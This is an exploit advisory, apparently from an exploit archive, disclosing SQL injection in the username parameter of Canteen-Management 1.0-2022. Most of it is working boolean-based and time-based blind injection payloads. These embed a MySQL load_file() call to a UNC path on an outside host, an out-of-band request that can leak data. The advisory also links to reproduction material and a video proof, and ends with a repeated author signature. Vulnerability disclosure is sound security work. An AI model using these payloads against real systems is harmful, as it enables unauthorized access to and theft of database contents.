## Title: Canteen-Management1.0-2022 SQLi ## Author: nu11secur1ty ## Date: 10.04.2022 ## Vendor: https://www.mayurik.com/ ## Software: https://github.com/nu11secur1ty/CVE-nu11secur1ty/blob/main/vendors/mayuri_k/2022/Canteen-Management/Docs/youthappam.zip?raw=true ## Reference: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi ## Description: The username parameter from Canteen-Management1.0-2022 appears to be vulnerable to SQL injection attacks. The malicious user can attack remotely this system by using this vulnerability to steal all information from the database of this system. STATUS: HIGH Vulnerability [+]Payload: ```mysql --- Parameter: username (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' OR NOT 6549=6549 AND 'gzCy'='gzCy&password=h5F!l8j!Y6&login= Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=UvIiDwEB'+(select load_file('\\\\dp63gurp7hq1sbs2l0zhxwq2yt4msdn1e42wpmdb.tupaciganka.com\\gfa'))+'' AND (SELECT 2876 FROM (SELECT(SLEEP(17)))IStn) AND 'awEr'='awEr&password=h5F!l8j!Y6&login= --- ``` ## Reproduce: [href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/mayuri_k/2022/Canteen-Management/SQLi) ## Proof and Exploit: [href](https://streamable.com/vvz2lh) -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://packetstormsecurity.com/ https://cve.mitre.org/index.html and https://www.exploit-db.com/ home page: https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty